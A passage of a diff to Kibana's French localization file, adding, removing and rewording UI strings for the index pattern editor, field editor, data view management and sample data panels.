{name}.", - "homePackages.sampleDataSet.unableToLoadListErrorMessage": "Impossible de charger la liste des exemples d’ensemble de données", - "homePackages.sampleDataSet.unableToUninstallErrorMessage": "Impossible de désinstaller l'exemple d’ensemble de données : {name}.", + "homePackages.sampleDataSet.unableToInstallErrorMessage": "Impossible d'installer l'exemple d’ensemble de données : {name}.", + "homePackages.sampleDataSet.unableToUninstallErrorMessage": "Impossible de désinstaller l'exemple d’ensemble de données : {name}.", "homePackages.sampleDataSet.uninstalledLabel": "{name} désinstallé", - "homePackages.sampleDataCard.addButtonAriaLabel": "Ajouter {datasetName}", + "homePackages.demoEnvironmentPanel.welcomeImageAlt": "Illustration des intégrations de données Elastic", + "homePackages.demoEnvironmentPanel.welcomeMessage": "Parcourez des données réelles dans un environnement de 
démonstration où vous pourrez explorer des cas d'utilisation de recherche, d'observabilité et de sécurité comme le vôtre.", + "homePackages.demoEnvironmentPanel.welcomeTitle": "Explorer notre environnement de démonstration en direct", "homePackages.sampleDataCard.addButtonLabel": "Ajouter des données", - "homePackages.sampleDataCard.addingButtonAriaLabel": "Ajout de {datasetName}", "homePackages.sampleDataCard.addingButtonLabel": "Ajout", "homePackages.sampleDataCard.dashboardLinkLabel": "Tableau de bord", - "homePackages.sampleDataCard.default.addButtonAriaLabel": "Ajouter {datasetName}", "homePackages.sampleDataCard.default.addButtonLabel": "Ajouter des données", - "homePackages.sampleDataCard.default.unableToVerifyErrorMessage": "Impossible de vérifier le statut de l'ensemble de données. Erreur : {statusMsg}.", - "homePackages.sampleDataCard.removeButtonAriaLabel": "Supprimer {datasetName}", "homePackages.sampleDataCard.removeButtonLabel": "Supprimer", - "homePackages.sampleDataCard.removingButtonAriaLabel": "Suppression de {datasetName}", "homePackages.sampleDataCard.removingButtonLabel": "Suppression", - "homePackages.sampleDataCard.viewDataButtonAriaLabel": "Consulter {datasetName}", "homePackages.sampleDataCard.viewDataButtonLabel": "Consulter les données", + "homePackages.sampleDataSet.unableToLoadListErrorMessage": "Impossible de charger la liste des exemples d’ensemble de données", + "homePackages.tutorials.sampleData.sampleDataLabel": "Autres exemples d’ensembles de données", + "indexPatternEditor.pagingLabel": "Lignes par page : {perPage}", + "indexPatternEditor.rollup.uncaughtError": "Erreur de vue de données de cumul : {error}", + "indexPatternEditor.status.matchAnyLabel.matchAnyDetail": "Votre modèle d'indexation peut correspondre à {sourceCount, plural, one {# source} other {# sources} }.", + "indexPatternEditor.status.notMatchLabel.allIndicesLabel": "{indicesLength, plural, one {# source} other {# sources} }", + 
"indexPatternEditor.status.notMatchLabel.notMatchDetail": "Le modèle d'indexation spécifié ne correspond à aucun flux de données, index ni alias d'index. Vous pouvez faire correspondre {strongIndices}.", + "indexPatternEditor.status.partialMatchLabel.partialMatchDetail": "Votre modèle d'indexation ne correspond à aucun flux de données, index ni alias d'index, mais {strongIndices} {matchedIndicesLength, plural, one {est semblable} other {sont semblables} }.", + "indexPatternEditor.status.partialMatchLabel.strongIndicesLabel": "{matchedIndicesLength, plural, one {source} other {# sources} }", + "indexPatternEditor.status.successLabel.successDetail": "Votre modèle d'indexation correspond à {sourceCount} {sourceCount, plural, one {source} other {sources} }.", "indexPatternEditor.aliasLabel": "Alias", "indexPatternEditor.createIndex.noMatch": "Le nom doit correspondre à au moins un flux de données, index ou alias d'index.", "indexPatternEditor.createIndexPattern.stepTime.noTimeFieldOptionLabel": "--- Je ne souhaite pas utiliser le filtre temporel ---", "indexPatternEditor.dataStreamLabel": "Flux de données", "indexPatternEditor.dataView.unableSaveLabel": "Échec de l'enregistrement de la vue de données.", - "indexPatternEditor.dataViewExists.ValidationErrorMessage": "Une vue de données avec ce titre existe déjà.", + "indexPatternEditor.dataViewExists.ValidationErrorMessage": "Une vue de données de ce nom existe déjà.", + "indexPatternEditor.editDataView.editConfirmationModal.confirmButton": "Confirmer", + "indexPatternEditor.editDataView.editConfirmationModal.editHeader": "Modifier \"{name}\"", + "indexPatternEditor.editDataView.editConfirmationModal.modalDescription": "La modification de cette vue de données peut briser les autres objets qui en dépendent.", "indexPatternEditor.editor.flyoutCloseButtonLabel": "Fermer", - "indexPatternEditor.editor.flyoutSaveButtonLabel": "Créer une vue de données", + "indexPatternEditor.editor.flyoutEditButtonLabel": "Enregistrer", + 
"indexPatternEditor.editor.flyoutExploreButtonLabel": "Utiliser sans sauvegarder", + "indexPatternEditor.editor.flyoutExploreButtonTitle": "Utiliser cette vue de données sans créer d’objet enregistré", + "indexPatternEditor.editor.flyoutSaveButtonLabel": "Enregistrer la vue de données dans Kibana", "indexPatternEditor.editor.form.advancedSettings.hideButtonLabel": "Masquer les paramètres avancés", "indexPatternEditor.editor.form.advancedSettings.showButtonLabel": "Afficher les paramètres avancés", "indexPatternEditor.editor.form.allowHiddenLabel": "Autoriser les index masqués et système", "indexPatternEditor.editor.form.customIdHelp": "Kibana fournit un identifiant unique pour chaque vue de données, ou vous pouvez en créer un vous-même.", "indexPatternEditor.editor.form.customIdLabel": "ID de vue de données personnalisé", + "indexPatternEditor.editor.form.IsAdHocLabel": "Créer une vue de données ad hoc", + "indexPatternEditor.editor.form.nameLabel": "Nom", "indexPatternEditor.editor.form.noTimeFieldsLabel": "Aucun flux de données, index ni alias d'index correspondant ne dispose d'un champ d'horodatage.", "indexPatternEditor.editor.form.runtimeType.placeholderLabel": "Sélectionner un champ d'horodatage", "indexPatternEditor.editor.form.timeFieldHelp": "Sélectionnez le champ d'horodatage à utiliser avec le filtre temporel global.", "indexPatternEditor.editor.form.timeFieldLabel": "Champ d'horodatage", "indexPatternEditor.editor.form.timestampFieldHelp": "Sélectionnez le champ d'horodatage à utiliser avec le filtre temporel global.", "indexPatternEditor.editor.form.timestampSelectAriaLabel": "Champ d'horodatage", - "indexPatternEditor.editor.form.titleLabel": "Nom", + "indexPatternEditor.editor.form.titleLabel": "Modèle d'indexation", "indexPatternEditor.editor.form.TypeLabel": "Type de vue de données", "indexPatternEditor.editor.form.typeSelectAriaLabel": "Champ Type", "indexPatternEditor.form.allowHiddenAriaLabel": "Autoriser les index masqués et système", 
"indexPatternEditor.form.customIndexPatternIdLabel": "ID de vue de données personnalisé", - "indexPatternEditor.form.titleAriaLabel": "Champ de titre", - "indexPatternEditor.frozenLabel": "Gelé", + "indexPatternEditor.form.nameAriaLabel": "Champ de nom facultatif", + "indexPatternEditor.form.titleAriaLabel": "Champ de modèle d'indexation", + "indexPatternEditor.frozenLabel": "Frozen", "indexPatternEditor.indexLabel": "Index", "indexPatternEditor.loadingHeader": "Recherche d'index correspondants…", - "indexPatternEditor.pagingLabel": "Lignes par page : {perPage}", "indexPatternEditor.requireTimestampOption.ValidationErrorMessage": "Sélectionnez un champ d'horodatage.", - "indexPatternEditor.rollup.uncaughtError": "Erreur de vue de données de cumul : {error}", - "indexPatternEditor.rollupDataView.createIndex.noMatchError": "Erreur de vue de données de cumul : doit correspondre à un index de cumul", - "indexPatternEditor.rollupDataView.createIndex.tooManyMatchesError": "Erreur de vue de données de cumul : ne peut correspondre qu’à un index de cumul", + "indexPatternEditor.rollupDataView.createIndex.noMatchError": "Erreur de vue de données de cumul : doit correspondre à un index de cumul", + "indexPatternEditor.rollupDataView.createIndex.tooManyMatchesError": "Erreur de vue de données de cumul : ne peut correspondre qu’à un index de cumul", "indexPatternEditor.rollupDataView.warning.textParagraphOne": "Kibana propose un support bêta pour les vues de données basées sur les cumuls. Vous pourriez rencontrer des problèmes lors de l'utilisation de ces vues dans les recherches enregistrées, les visualisations et les tableaux de bord. Ils ne sont pas compatibles avec certaines fonctionnalités avancées, telles que Timelion et le Machine Learning.", "indexPatternEditor.rollupDataView.warning.textParagraphTwo": "Vous pouvez mettre une vue de données de cumul en correspondance avec un index de cumul et zéro index régulier ou plus. 
Une vue de données de cumul dispose d'indicateurs, de champs, d'intervalles et d'agrégations limités. Un index de cumul se limite aux index disposant d'une configuration de tâche ou de plusieurs tâches avec des configurations compatibles.", "indexPatternEditor.rollupIndexPattern.warning.title": "Fonctionnalité bêta", "indexPatternEditor.rollupLabel": "Cumul", - "indexPatternEditor.status.matchAnyLabel.matchAnyDetail": "Votre modèle d'indexation peut correspondre à {sourceCount, plural, one {# source} other {# sources} }.", + "indexPatternEditor.saved": "'{indexPatternName}' enregistré", "indexPatternEditor.status.noSystemIndicesLabel": "Aucun flux de données, index ni alias d'index ne correspond à votre modèle d'indexation.", "indexPatternEditor.status.noSystemIndicesWithPromptLabel": "Aucun flux de données, index ni alias d'index ne correspond à votre modèle d'indexation.", - "indexPatternEditor.status.notMatchLabel.allIndicesLabel": "{indicesLength, plural, one {# source} other {# sources} }", - "indexPatternEditor.status.notMatchLabel.notMatchDetail": "Le modèle d'indexation spécifié ne correspond à aucun flux de données, index ni alias d'index. 
Vous pouvez faire correspondre {strongIndices}.", "indexPatternEditor.status.notMatchLabel.notMatchNoIndicesDetail": "Le modèle d'indexation spécifié ne correspond à aucun flux de données, index ni alias d'index.", - "indexPatternEditor.status.partialMatchLabel.partialMatchDetail": "Votre modèle d'indexation ne correspond à aucun flux de données, index ni alias d'index, mais {strongIndices} {matchedIndicesLength, plural, one {est semblable} other {sont semblables} }.", - "indexPatternEditor.status.partialMatchLabel.strongIndicesLabel": "{matchedIndicesLength, plural, one {source} other {# sources} }", - "indexPatternEditor.status.successLabel.successDetail": "Votre modèle d'indexation correspond à {sourceCount} {sourceCount, plural, one {source} other {sources} }.", "indexPatternEditor.title": "Créer une vue de données", + "indexPatternEditor.titleEditMode": "Modifier la vue de données", "indexPatternEditor.typeSelect.betaLabel": "Bêta", "indexPatternEditor.typeSelect.rollup": "Cumul", "indexPatternEditor.typeSelect.rollupDescription": "Effectuer des agrégations limitées à partir de données résumées", 
@@ -4676,9 +3797,19 @@ "indexPatternEditor.typeSelect.standardTitle": "Vue de données standard", "indexPatternEditor.validations.noSingleAstriskPattern": "Un seul astérisque \"*\" n’est pas un modèle d'indexation autorisé", "indexPatternEditor.validations.titleHelpText": "Entrez un modèle d'indexation qui correspond à une ou plusieurs sources de données. Utilisez un astérisque (*) pour faire correspondre plusieurs caractères. Les espaces et les caractères , /, ?, \", <, >, | ne sont pas autorisés.", - "indexPatternEditor.validations.titleIsRequiredErrorMessage": "Nom obligatoire.", + "indexPatternEditor.validations.titleIsRequiredErrorMessage": "Un modèle d'indexation est requis.", + "indexPatternFieldEditor.date.momentLabel": "Modèle de format Moment.js (par défaut : {defaultPattern})", + "indexPatternFieldEditor.defaultErrorMessage": "Une erreur s'est produite lors de l'utilisation de cette configuration de format : {message}.", + "indexPatternFieldEditor.defaultFormatHeader": "Format (par défaut : {defaultFormat})", + "indexPatternFieldEditor.deleteRuntimeField.confirmModal.deleteMultipleTitle": "Supprimer {count} champs", + "indexPatternFieldEditor.editField.flyoutAriaLabel": "Modifier le champ {fieldName}", + "indexPatternFieldEditor.editor.flyoutEditFieldSubtitle": "Vue de données : {patternName}", + "indexPatternFieldEditor.editor.form.source.scriptFieldHelpText": "Les champs d'exécution sans script récupèrent les valeurs de {source}. Si un champ n'existe pas dans _source, la recherche ne renvoie pas de valeur. 
{learnMoreLink}", + "indexPatternFieldEditor.editor.form.valueDescription": "Définissez une valeur pour le champ au lieu de la récupérer à partir du champ portant le même nom dans {source}.", + "indexPatternFieldEditor.fieldPreview.subTitle": "Depuis : {from}", + "indexPatternFieldEditor.number.numeralLabel": "Modèle de format Numeral.js (par défaut : {defaultPattern})", "indexPatternFieldEditor.cancelField.confirmationModal.cancelButtonLabel": "Annuler", - "indexPatternFieldEditor.cancelField.confirmationModal.description": "Les modifications apportées à votre champ seront ignorées. Voulez-vous vraiment continuer ?", + "indexPatternFieldEditor.cancelField.confirmationModal.description": "Les modifications apportées à votre champ seront ignorées. Voulez-vous vraiment continuer ?", "indexPatternFieldEditor.cancelField.confirmationModal.title": "Ignorer les modifications", "indexPatternFieldEditor.color.actions": "Actions", "indexPatternFieldEditor.color.addColorButton": "Ajouter une couleur", 
@@ -4691,18 +3822,14 @@
 "indexPatternFieldEditor.color.textColorLabel": "Couleur du texte",
 "indexPatternFieldEditor.createField.flyoutAriaLabel": "Créer un champ",
 "indexPatternFieldEditor.date.documentationLabel": "Documentation",
- "indexPatternFieldEditor.date.momentLabel": "Modèle de format Moment.js (par défaut : {defaultPattern})",
- "indexPatternFieldEditor.defaultErrorMessage": "Une erreur s'est produite lors de l'utilisation de cette configuration de format : {message}.",
 "indexPatternFieldEditor.defaultFormatDropDown": "- Par défaut -",
- "indexPatternFieldEditor.defaultFormatHeader": "Format (par défaut : {defaultFormat})",
 "indexPatternFieldEditor.deleteField.savedHeader": "\"{fieldName}\" enregistré",
 "indexPatternFieldEditor.deleteRuntimeField.confirmationModal.cancelButtonLabel": "Annuler",
 "indexPatternFieldEditor.deleteRuntimeField.confirmationModal.removeButtonLabel": "Supprimer le champ",
 "indexPatternFieldEditor.deleteRuntimeField.confirmationModal.removeMultipleButtonLabel": "Supprimer les champs",
 "indexPatternFieldEditor.deleteRuntimeField.confirmationModal.saveButtonLabel": "Enregistrer les modifications",
- "indexPatternFieldEditor.deleteRuntimeField.confirmModal.deleteMultipleTitle": "Supprimer {count} champs",
 "indexPatternFieldEditor.deleteRuntimeField.confirmModal.deleteSingleTitle": "Supprimer le champ \"{name}\"",
- "indexPatternFieldEditor.deleteRuntimeField.confirmModal.multipleDeletionDescription": "Vous êtes sur le point de supprimer les champs d'exécution suivants :",
+ "indexPatternFieldEditor.deleteRuntimeField.confirmModal.multipleDeletionDescription": "Vous êtes sur le point de supprimer les champs d'exécution suivants :",
 "indexPatternFieldEditor.deleteRuntimeField.confirmModal.typeConfirm": "Saisissez REMOVE pour confirmer.",
 "indexPatternFieldEditor.deleteRuntimeField.confirmModal.warningChangingFields": "Modifier le nom ou le type peut affecter les recherches et les visualisations utilisant ce champ.",
 "indexPatternFieldEditor.deleteRuntimeField.confirmModal.warningRemovingFields": "Supprimer un champ peut affecter les recherches et les visualisations utilisant ce champ.",
@@ -4712,11 +3839,9 @@
 "indexPatternFieldEditor.duration.outputFormatLabel": "Format de sortie",
 "indexPatternFieldEditor.duration.showSuffixLabel": "Afficher le suffixe",
 "indexPatternFieldEditor.duration.showSuffixLabel.short": "Utiliser un suffixe court",
- "indexPatternFieldEditor.durationErrorMessage": "Le nombre de décimales doit être compris entre 0 et 20.",
- "indexPatternFieldEditor.editField.flyoutAriaLabel": "Modifier le champ {fieldName}",
+ "indexPatternFieldEditor.durationErrorMessage": "Le nombre de décimales doit être compris entre 0 et 20.",
 "indexPatternFieldEditor.editor.flyoutCancelButtonLabel": "Annuler",
 "indexPatternFieldEditor.editor.flyoutDefaultTitle": "Créer un champ",
- "indexPatternFieldEditor.editor.flyoutEditFieldSubtitle": "Vue de données : {patternName}",
 "indexPatternFieldEditor.editor.flyoutEditFieldTitle": "Modifier le champ \"{fieldName}\"",
 "indexPatternFieldEditor.editor.flyoutSaveButtonLabel": "Enregistrer",
 "indexPatternFieldEditor.editor.form.advancedSettings.hideButtonLabel": "Masquer les paramètres avancés",
@@ -4742,15 +3867,13 @@
 "indexPatternFieldEditor.editor.form.scriptEditor.compileErrorMessage": "Erreur lors de la compilation du script Painless",
 "indexPatternFieldEditor.editor.form.scriptEditorAriaLabel": "Éditeur de script",
 "indexPatternFieldEditor.editor.form.scriptEditorPainlessValidationMessage": "Script Painless non valide.",
- "indexPatternFieldEditor.editor.form.source.scriptFieldHelpText": "Les champs d'exécution sans script récupèrent les valeurs de {source}. Si un champ n'existe pas dans _source, la recherche ne renvoie pas de valeur. {learnMoreLink}",
 "indexPatternFieldEditor.editor.form.typeSelectAriaLabel": "Sélection du type",
 "indexPatternFieldEditor.editor.form.validations.customLabelIsRequiredErrorMessage": "Spécifiez une étiquette pour le champ.",
 "indexPatternFieldEditor.editor.form.validations.nameIsRequiredErrorMessage": "Nom obligatoire.",
- "indexPatternFieldEditor.editor.form.validations.popularityGreaterThan0ErrorMessage": "La popularité doit être définie sur 0 ou plus.",
+ "indexPatternFieldEditor.editor.form.validations.popularityGreaterThan0ErrorMessage": "La popularité doit être définie sur 0 ou plus.",
 "indexPatternFieldEditor.editor.form.validations.popularityIsRequiredErrorMessage": "Spécifiez la popularité du champ.",
 "indexPatternFieldEditor.editor.form.validations.scriptIsRequiredErrorMessage": "Un script est obligatoire pour définir la valeur du champ.",
 "indexPatternFieldEditor.editor.form.validations.starCharacterNotAllowedValidationErrorMessage": "Le nom du champ ne peut pas contenir *.",
- "indexPatternFieldEditor.editor.form.valueDescription": "Définissez une valeur pour le champ au lieu de la récupérer à partir du champ portant le même nom dans {source}.",
 "indexPatternFieldEditor.editor.form.valueTitle": "Définir la valeur",
 "indexPatternFieldEditor.editor.runtimeFieldsEditor.existRuntimeFieldNamesValidationErrorMessage": "Un champ portant ce nom existe déjà.",
 "indexPatternFieldEditor.fieldPreview.documentIdField.label": "ID de document",
@@ -4775,7 +3898,6 @@
 "indexPatternFieldEditor.fieldPreview.searchResult.emptyPromptTitle": "Aucun champ correspondant dans cette vue de données",
 "indexPatternFieldEditor.fieldPreview.showLessFieldsButtonLabel": "Afficher moins",
 "indexPatternFieldEditor.fieldPreview.showMoreFieldsButtonLabel": "Afficher plus",
- "indexPatternFieldEditor.fieldPreview.subTitle": "Depuis : {from}",
 "indexPatternFieldEditor.fieldPreview.subTitle.customData": "Données personnalisées",
 "indexPatternFieldEditor.fieldPreview.title": "Aperçu",
 "indexPatternFieldEditor.fieldPreview.updatingPreviewLabel": "Mise à jour...",
@@ -4790,7 +3912,6 @@
 "indexPatternFieldEditor.histogram.subFormat.percent": "Pourcentage",
 "indexPatternFieldEditor.noSuchFieldName": "Champ \"{fieldName}\" introuvable dans le modèle d'indexation",
 "indexPatternFieldEditor.number.documentationLabel": "Documentation",
- "indexPatternFieldEditor.number.numeralLabel": "Modèle de format Numeral.js (par défaut : {defaultPattern})",
 "indexPatternFieldEditor.samples.inputHeader": "Entrée",
 "indexPatternFieldEditor.samples.outputHeader": "Sortie",
 "indexPatternFieldEditor.samplesHeader": "Exemples",
@@ -4819,10 +3940,54 @@ "indexPatternFieldEditor.url.typeLabel": "Type", "indexPatternFieldEditor.url.urlTemplateLabel": "Modèle d'URL", "indexPatternFieldEditor.url.widthLabel": "Largeur", + "indexPatternManagement.createDataView.emptyState.createAnywayTxt": "Vous pouvez également {link}", + "indexPatternManagement.dataViewTable.deleteButtonLabel": "Supprimer {selectedItems, number} {selectedItems, plural, one {vue de données} other {vues de données} }", + "indexPatternManagement.dataViewTable.deleteConfirmSummary": "Vous allez supprimer de manière définitive {count, number} {count, plural, one {vue de données} other {vues de données} }.", + "indexPatternManagement.defaultFormatHeader": "Format (par défaut : {defaultFormat})", + "indexPatternManagement.deleteFieldLabel": "Il est impossible de récupérer un champ supprimé.{separator}Voulez-vous vraiment continuer ?", + "indexPatternManagement.editDataView.deleteWarning": "La vue de données {dataViewName} va être supprimée. Vous ne pouvez pas annuler cette action.", + "indexPatternManagement.editDataView.deleteWarningWithNamespaces": "Supprimer la vue de données {dataViewName} de tous les espaces dans lesquels elle est partagée. Vous ne pouvez pas annuler cette action.", + "indexPatternManagement.editHeader": "Modifier {fieldName}", + "indexPatternManagement.editIndexPattern.deprecation": "Les champs scriptés sont déclassés. 
Utilisez {runtimeDocs} à la place.", + "indexPatternManagement.editIndexPattern.fields.conflictModal.description": "Le type de champ {fieldName} change entre les index et peut ne pas être disponible pour la recherche, les visualisations et d'autres analyses.", + "indexPatternManagement.editIndexPattern.list.DateHistogramDelaySummary": "retard : {delay},", + "indexPatternManagement.editIndexPattern.list.dateHistogramSummary": "{aggName} (intervalle : {interval}, {delay} {time_zone})", + "indexPatternManagement.editIndexPattern.list.histogramSummary": "{aggName} (intervalle : {interval})", + "indexPatternManagement.editIndexPattern.mappingConflictLabel": "{conflictFieldsLength, plural, one {Un champ est défini} other {# champs sont définis}} avec plusieurs types (chaîne, entier, etc.) dans les différents index qui correspondent à ce modèle. Vous pourrez peut-être utiliser ce ou ces champs en conflit dans certaines parties de Kibana, mais ils ne seront pas disponibles pour les fonctions qui nécessitent que Kibana connaisse leur type. Pour corriger ce problème, vous devrez réindexer vos données.", + "indexPatternManagement.editIndexPattern.scripted.deprecationLangLabel.deprecationLangDetail": "Les langages déclassés suivants sont en cours d'utilisation : {deprecatedLangsInUse}. La prise en charge de ces langages sera supprimée dans la prochaine version majeure de Kibana et d'Elasticsearch. Convertissez vos champs scriptés en {link} pour éviter tout problème.", + "indexPatternManagement.editIndexPattern.tabs.relationshipsHeader": "Relations ({count})", + "indexPatternManagement.mappingConflictLabel.mappingConflictDetail": "{mappingConflict} Vous avez déjà un champ nommé {fieldName}. 
Si vous donnez le même nom à votre champ scripté, vous ne pourrez pas interroger les deux champs en même temps.", + "indexPatternManagement.script.accessWithLabel": "Accédez aux champs avec {code}.", + "indexPatternManagement.scriptedFieldsDeprecatedBody": "Pour profiter de plus de flexibilité et de la prise en charge des scripts Painless, utilisez {runtimeDocs}.", + "indexPatternManagement.syntax.defaultLabel.defaultDetail": "Par défaut, les champs scriptés Kibana emploient {painless}, un langage de script simple et sécurisé spécialement conçu pour Elasticsearch. Pour accéder aux valeurs du document, utilisez le format suivant :", + "indexPatternManagement.syntax.lucene.commonLabel.commonDetail": "Vous venez d'une ancienne version de Kibana ? Les expressions {lucene} que vous connaissez et adorez sont toujours disponibles. Les expressions Lucene ressemblent beaucoup à du JavaScript, mais elles se limitent aux opérations arithmétiques de base, aux opérations au niveau du bit et aux opérations de comparaison.", + "indexPatternManagement.syntax.lucene.operations.arithmeticLabel": "Opérateurs arithmétiques : {operators}", + "indexPatternManagement.syntax.lucene.operations.bitwiseLabel": "Opérateurs au niveau du bit : {operators}", + "indexPatternManagement.syntax.lucene.operations.booleanLabel": "Opérateurs booléens (y compris l'opérateur ternaire) : {operators}", + "indexPatternManagement.syntax.lucene.operations.comparisonLabel": "Opérateurs de comparaison : {operators}", + "indexPatternManagement.syntax.lucene.operations.distanceLabel": "Fonctions de distance : {operators}", + "indexPatternManagement.syntax.lucene.operations.mathLabel": "Fonctions mathématiques communes : {operators}", + "indexPatternManagement.syntax.lucene.operations.miscellaneousLabel": "Fonctions diverses : {operators}", + "indexPatternManagement.syntax.lucene.operations.trigLabel": "Fonctions de bibliothèque trigonométrique : {operators}", + 
"indexPatternManagement.syntax.painlessLabel.painlessDetail": "Painless est un langage puissant, mais facile à utiliser. Il donne accès à de nombreuses {javaAPIs}. Lisez-en plus sur sa {syntax} et découvrez tout ce que vous devez savoir en un rien de temps !", + "indexPatternManagement.warningCallOutLabel.callOutDetail": "Familiarisez-vous avec les {scripFields} et les {scriptsInAggregation} avant d'utiliser cette fonctionnalité. Les champs scriptés peuvent être utilisés pour afficher et agréger les valeurs calculées. Dès lors, ils peuvent être très lents et, s'ils ne sont pas faits correctement, ils peuvent rendre Kibana inutilisable.", + "indexPatternManagement.warningLabel.warningDetail": "{language} est déclassé et ne sera plus pris en charge dans la prochaine version majeure de Kibana et d'Elasticsearch. Nous recommandons d'utiliser {painlessLink} pour les nouveaux champs scriptés.", "indexPatternManagement.actions.cancelButton": "Annuler", "indexPatternManagement.actions.createButton": "Créer un champ", "indexPatternManagement.actions.deleteButton": "Supprimer", "indexPatternManagement.actions.saveButton": "Enregistrer le champ", + "indexPatternManagement.createDataView.emptyState.checkDataButton": "Rechercher de nouvelles données", + "indexPatternManagement.createDataView.emptyState.createAnywayLink": "créer une vue de données par rapport à des index masqués, système ou par défaut.", + "indexPatternManagement.createDataView.emptyState.haveData": "Vous pensez avoir déjà des données ?", + "indexPatternManagement.createDataView.emptyState.integrationCardDescription": "Ajoutez des données depuis diverses sources.", + "indexPatternManagement.createDataView.emptyState.integrationCardTitle": "Ajouter une intégration", + "indexPatternManagement.createDataView.emptyState.learnMore": "Envie d'en savoir plus ?", + "indexPatternManagement.createDataView.emptyState.noDataTitle": "Vous êtes prêt à essayer Kibana ? 
Tout d'abord, vous avez besoin de données.", + "indexPatternManagement.createDataView.emptyState.readDocs": "Lire la documentation", + "indexPatternManagement.createDataView.emptyState.sampleDataCardDescription": "Chargez un ensemble de données et un tableau de bord Kibana.", + "indexPatternManagement.createDataView.emptyState.sampleDataCardTitle": "Ajouter un exemple de données", + "indexPatternManagement.createDataView.emptyState.uploadCardDescription": "Importez un fichier CSV, NDJSON ou log.", + "indexPatternManagement.createDataView.emptyState.uploadCardTitle": "Charger un fichier", "indexPatternManagement.createHeader": "Créer un champ scripté", "indexPatternManagement.customLabel": "Étiquette personnalisée", "indexPatternManagement.dataView.sectionsHeader": "Vues de données", @@ -4833,8 +3998,6 @@ "indexPatternManagement.dataViewTable.columnDeleteDescription": "Supprimer cette vue de données", "indexPatternManagement.dataViewTable.createBtn": "Créer une vue de données", "indexPatternManagement.dataViewTable.dataViewColumnName": "Vue de données", - "indexPatternManagement.dataViewTable.deleteButtonLabel": "Supprimer {selectedItems, number} {selectedItems, plural, one {vue de données} other {vues de données} }", - "indexPatternManagement.dataViewTable.deleteConfirmSummary": "Vous allez supprimer de manière définitive {count, number} {count, plural, one {vue de données} other {vues de données} }.", "indexPatternManagement.dataViewTable.indexPatternExplanation": "Créez et gérez les vues de données afin de récupérer vos données depuis Elasticsearch.", "indexPatternManagement.dataViewTable.nameColumn": "Nom", "indexPatternManagement.dataViewTable.spaceCountAll": "tous", 
@@ -4843,32 +4006,27 @@ "indexPatternManagement.dataViewTable.tableTitle": "Vues de données sélectionnées pour la suppression", "indexPatternManagement.dataViewTable.title": "Vues de données", "indexPatternManagement.defaultFormatDropDown": "- Par défaut -", - "indexPatternManagement.defaultFormatHeader": "Format (par défaut : {defaultFormat})", "indexPatternManagement.deleteField.cancelButton": "Annuler", "indexPatternManagement.deleteField.deleteButton": "Supprimer", "indexPatternManagement.deleteField.deletedHeader": "\"’{fieldName}\" supprimé", "indexPatternManagement.deleteField.savedHeader": "\"{fieldName}\" enregistré", "indexPatternManagement.deleteFieldHeader": "Supprimer le champ \"{fieldName}\"", - "indexPatternManagement.deleteFieldLabel": "Il est impossible de récupérer un champ supprimé.{separator}Voulez-vous vraiment continuer ?", "indexPatternManagement.disabledCallOutHeader": "Scripts désactivés", "indexPatternManagement.disabledCallOutLabel": "Tous les scripts en ligne ont été désactivés dans Elasticsearch. Vous devez activer les scripts en ligne pour au moins un langage afin d'utiliser des champs scriptés dans Kibana.", "indexPatternManagement.editDataView.deleteHeader": "Supprimer la vue de données", - "indexPatternManagement.editDataView.deleteWarning": "La vue de données {dataViewName} va être supprimée. Vous ne pouvez pas annuler cette action.", - "indexPatternManagement.editDataView.deleteWarningWithNamespaces": "Supprimer la vue de données {dataViewName} de tous les espaces dans lesquels elle est partagée. 
Vous ne pouvez pas annuler cette action.", "indexPatternManagement.editDataView.detailsAria": "Détails de la vue de données", + "indexPatternManagement.editDataView.editAria": "Modifier la vue de données.", + "indexPatternManagement.editDataView.editTooltip": "Modifier", "indexPatternManagement.editDataView.fields.table.conflictType": "Conflit", "indexPatternManagement.editDataView.fields.table.runtimeIconTipText": "Ce champ existe uniquement dans la vue de données.", "indexPatternManagement.editDataView.removeAria": "Supprimer la vue de données.", - "indexPatternManagement.editDataView.removeTooltip": "Supprimer la vue de données.", + "indexPatternManagement.editDataView.removeTooltip": "Supprimer", "indexPatternManagement.editDataView.setDefaultAria": "Définir en tant que vue de données par défaut.", - "indexPatternManagement.editDataView.setDefaultTooltip": "Définir en tant que vue de données par défaut.", - "indexPatternManagement.editHeader": "Modifier {fieldName}", + "indexPatternManagement.editDataView.setDefaultTooltip": "Définir par défaut", "indexPatternManagement.editIndexPattern.badge.securityDataViewTitle": "Vue de données Security", "indexPatternManagement.editIndexPattern.deleteButton": "Supprimer", - "indexPatternManagement.editIndexPattern.deprecation": "Les champs scriptés sont déclassés. 
Utilisez {runtimeDocs} à la place.", "indexPatternManagement.editIndexPattern.fields.addFieldButtonLabel": "Ajouter un champ", "indexPatternManagement.editIndexPattern.fields.conflictModal.closeBtn": "Fermer", - "indexPatternManagement.editIndexPattern.fields.conflictModal.description": "Le type de champ {fieldName} change entre les index et peut ne pas être disponible pour la recherche, les visualisations et d'autres analyses.", "indexPatternManagement.editIndexPattern.fields.conflictModal.title": "Ce champ possède un conflit de type", "indexPatternManagement.editIndexPattern.fields.filter": "Type du champ", "indexPatternManagement.editIndexPattern.fields.filterAria": "Filtrer les types de champ", 
@@ -4904,19 +4062,15 @@ "indexPatternManagement.editIndexPattern.fields.table.searchableDescription": "Ces champs peuvent être utilisés dans la barre de filtre.", "indexPatternManagement.editIndexPattern.fields.table.searchableHeader": "Interrogeable", "indexPatternManagement.editIndexPattern.fields.table.typeHeader": "Type", - "indexPatternManagement.editIndexPattern.list.DateHistogramDelaySummary": "retard : {delay},", - "indexPatternManagement.editIndexPattern.list.dateHistogramSummary": "{aggName} (intervalle : {interval}, {delay} {time_zone})", + "indexPatternManagement.editIndexPattern.indexPatternHeading": "Modèle d'indexation :", "indexPatternManagement.editIndexPattern.list.defaultIndexPatternListName": "Par défaut", - "indexPatternManagement.editIndexPattern.list.histogramSummary": "{aggName} (intervalle : {interval})", "indexPatternManagement.editIndexPattern.list.rollupIndexPatternListName": "Cumul", "indexPatternManagement.editIndexPattern.mappingConflictHeader": "Conflit de mapping", - "indexPatternManagement.editIndexPattern.mappingConflictLabel": "{conflictFieldsLength, plural, one {Un champ est défini} other {# champs sont définis}} avec plusieurs types (chaîne, entier, etc.) dans les différents index qui correspondent à ce modèle. Vous pourrez peut-être utiliser ce ou ces champs en conflit dans certaines parties de Kibana, mais ils ne seront pas disponibles pour les fonctions qui nécessitent que Kibana connaisse leur type. 
